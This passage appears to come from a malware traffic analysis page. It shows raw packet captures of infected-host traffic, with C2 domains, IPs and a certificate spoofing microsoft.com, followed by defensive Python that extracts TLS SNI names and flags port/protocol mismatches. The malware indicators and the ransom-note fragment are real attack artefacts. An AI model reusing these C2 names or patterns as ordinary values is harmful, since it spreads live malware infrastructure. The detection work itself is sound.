E..9;?@.r.kg……………3.]..P..D……………….0…0………   ..u…8d.0..    *.H……..0..1.0       ..U….US1.0    ..U….US1.0…U….NewYork1.0…U.
..Private1.0…U….Private1.0…U….microsoft.com1&0$.        *.H…. …private@sysprivpop.lkdd0…160411003559Z..170411003559Z0..1.0        ..U….US1.0    ..U….US1.0…U….NewYork1.0…U.
..Private1.0…U….Private1.0…U….microsoft.com1&0$.        *.H…. …private@sysprivpop.lkdd0..”0..       *.H………….0..
…………t^g……..`C?B..R….O9.o]….#*.PI…i…..`e..Id=7..T.t.K..+.a2N\
..\$.OD<….|…..t….!P.u..p.D…OA…\……X….;..&..5.J..3.}.pTx……D…..c.z.N…-2….”qv)…@4..Xf:….T7.
@……3..s..2..&….w.o._.=F^%…….Z..H…^}cz…….j.-………P0N0…U……..$.l..9….q….c..0…U.#..0…..$.l..9….q….c..0…U….0….0..        *.H……………..+……QI….K$.KT.z13…….v…….|4nC0]..@.Y…..S……….A…t.0.(.kB….\bu*:…g…,..AeJ[E.Y.9..|_/..L.-…..N..5]]..j.”8..#.u……v..P(.C:-……’..+…:+&.*[T…U….?.,..o!…j..\V…R..>x.2….D7.-..q.7….W….>……_=z…V………D………..
2016-09-01 19:01:27.849663 IP 192.168.4.175.50071 > 176.189.232.3.443: Flags [.], ack 1121, win 16257, length 0
E..(5.@…g…………..]…..DP.?.o………

2016-09-01 19:02:37.162264 IP 192.168.4.175.50073 > 62.75.207.97.443: Flags [S], seq 3405242436, win 8192, options [mss 1464,nop,wscale 2,nop,nop,sackOK], length 0
E..46’@………>K.a…….D…… ..}…………..
2016-09-01 19:02:37.438269 IP 62.75.207.97.443 > 192.168.4.175.50073: Flags [S.], seq 3326033908, ack 3405242437, win 14600, options [mss 1350,nop,wscale 6,nop,nop,sackOK], length 0
E..4,F@.5.Fz>K.a………??….E..9……..F……..
2016-09-01 19:02:37.438392 IP 192.168.4.175.50073 > 62.75.207.97.443: Flags [.], ack 1, win 16537, length 0
E..(6)@………>K.a…….E.??.P.@.%p……..
2016-09-01 19:02:37.438829 IP 192.168.4.175.50073 > 62.75.207.97.443: Flags [P.], seq 1:199, ack 1, win 16537, length 198
E…6*@………>K.a…….E.??.P.@…………….W..sT3.383.:zZ..1p7…g…u….
..*.<./.=.5…
.’…..+.#.,.$. .
.@.2.j.8…….j……..4.2../cfa8ed451f322249a33d9f877f75356c.konektyfor.com……….
…………………………….
2016-09-01 19:02:37.631759 IP 62.75.207.97.443 > 192.168.4.175.50073: Flags [.], ack 199, win 245, length 0
E..(..@.5…>K.a………??…..P…dN..
2016-09-01 19:02:37.631878 IP 62.75.207.97.443 > 192.168.4.175.50073: Flags [.], seq 1:1351, ack 199, win 245, length 1350
E..n..@.5…>K.a………??…..P…T#……Y…U..W…+C.”….8..H.8…I…..X…. ..f…..Q.Kv.@      …j[…(Lw..X..|……………………………0…0………        ..u…8d.0..    *.H……..0..1.0       ..U….US1.0    ..U….US1.0…U….NewYork1.0…U.
..Private1.0…U….Private1.0…U….microsoft.com1&0$.        *.H…. …private@sysprivpop.lkdd0…160411003559Z..170411003559Z0..1.0        ..U….US1.0    ..U….US1.0…U….NewYork1.0…U.
..Private1.0…U….Private1.0…U….microsoft.com1&0$.        *.H…. …private@sysprivpop.lkdd0..”0..       *.H………….0..
…………t^g……..`C?B..R….O9.o]….#*.PI…i…..`e..Id=7..T.t.K..+.a2N\
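
Two of the captures on this page break the usual port assumptions: in the GootKit sample the client sends a TLS ClientHello to 120.114.184.49 on port 80 (the server name neonbdfindcraft.win is readable inside it), and in the CryptMIC sample the ransom note arrives as cleartext from port 443. The Qadars sample likewise exposes j8le7s5q745e.org and cfa8ed451f322249a33d9f877f75356c.konektyfor.com in the SNI extension before any encryption starts. The Python below is an added example, not code from the page: it pulls the host_name out of a raw ClientHello and flags a TLS record on port 80 or printable text on port 443. The ClientHello bytes come from build_client_hello(), a constructed stand-in for the captured packets; record and extension layout follow RFC 5246 and RFC 6066.

```python
import struct
from typing import Optional


def build_client_hello(server_name: str) -> bytes:
    """Constructed minimal TLS ClientHello (record + handshake) with one SNI entry.
    Stand-in for the captured packets; layout per RFC 5246 / RFC 6066."""
    host = server_name.encode("ascii")
    sni_entry = b"\x00" + struct.pack("!H", len(host)) + host  # name_type 0 = host_name
    sni_list = struct.pack("!H", len(sni_entry)) + sni_entry
    ext_sni = struct.pack("!HH", 0x0000, len(sni_list)) + sni_list
    # An unrelated extension goes first so the parser has to walk the list.
    ext_sigalgs = struct.pack("!HH", 0x000D, 4) + b"\x00\x02\x04\x01"
    extensions = ext_sigalgs + ext_sni
    body = (
        b"\x03\x03" + b"\x11" * 32 + b"\x00"           # version, random, empty session id
        + struct.pack("!H", 4) + b"\xc0\x2f\x00\x2f"   # two cipher suites
        + b"\x01\x00"                                  # one compression method (null)
        + struct.pack("!H", len(extensions)) + extensions
    )
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake


def extract_sni(payload: bytes) -> Optional[str]:
    """Return the host_name from a ClientHello's SNI extension, or None if absent."""
    if len(payload) < 43 or payload[0] != 0x16 or payload[5] != 0x01:
        return None  # not a handshake record, or not a ClientHello
    rec_len = struct.unpack("!H", payload[3:5])[0]
    hs = payload[5:5 + rec_len]
    body = hs[4:4 + int.from_bytes(hs[1:4], "big")]
    try:
        pos = 2 + 32                                           # client_version + random
        pos += 1 + body[pos]                                   # session_id
        pos += 2 + struct.unpack("!H", body[pos:pos + 2])[0]   # cipher_suites
        pos += 1 + body[pos]                                   # compression_methods
        if pos + 2 > len(body):
            return None                                        # no extensions block
        ext_end = pos + 2 + struct.unpack("!H", body[pos:pos + 2])[0]
        pos += 2
        while pos + 4 <= ext_end:
            etype, elen = struct.unpack("!HH", body[pos:pos + 4])
            pos += 4
            if etype == 0x0000:                                # server_name
                lpos = pos + 2
                list_end = pos + 2 + struct.unpack("!H", body[pos:pos + 2])[0]
                while lpos + 3 <= list_end:
                    ntype = body[lpos]
                    nlen = struct.unpack("!H", body[lpos + 1:lpos + 3])[0]
                    if ntype == 0:
                        return body[lpos + 3:lpos + 3 + nlen].decode("ascii", "replace")
                    lpos += 3 + nlen
            pos += elen
    except (IndexError, struct.error):
        return None                                            # truncated or malformed
    return None


def port_protocol_mismatch(port: int, payload: bytes) -> Optional[str]:
    """Flag TLS records on port 80 and printable cleartext on port 443.
    'port' is the well-known side of the conversation (the server port)."""
    looks_tls = len(payload) >= 6 and payload[0] in (0x14, 0x15, 0x16, 0x17) and payload[1] == 0x03
    sample = payload[:64]
    looks_text = bool(sample) and all(32 <= b < 127 or b in (9, 10, 13) for b in sample)
    if port == 80 and looks_tls:
        return "tls-on-port-80"
    if port == 443 and looks_text:
        return "cleartext-on-port-443"
    return None


if __name__ == "__main__":
    hello = build_client_hello("neonbdfindcraft.win")   # constructed, mirrors the GootKit sample
    print(extract_sni(hello), port_protocol_mismatch(80, hello))
    note = b"NOT YOUR LANGUAGE? USE https://translate.google.com\n\nWhat happened to your files ?\n"
    print(port_protocol_mismatch(443, note))
```

The two checks are deliberately independent of each other: the SNI parser gives the analyst the C2 name from a flow that would otherwise be opaque, and the port check catches the two cases on this page where a port-based filter (only inspect 80 as HTTP, treat 443 as encrypted) would have hidden the traffic.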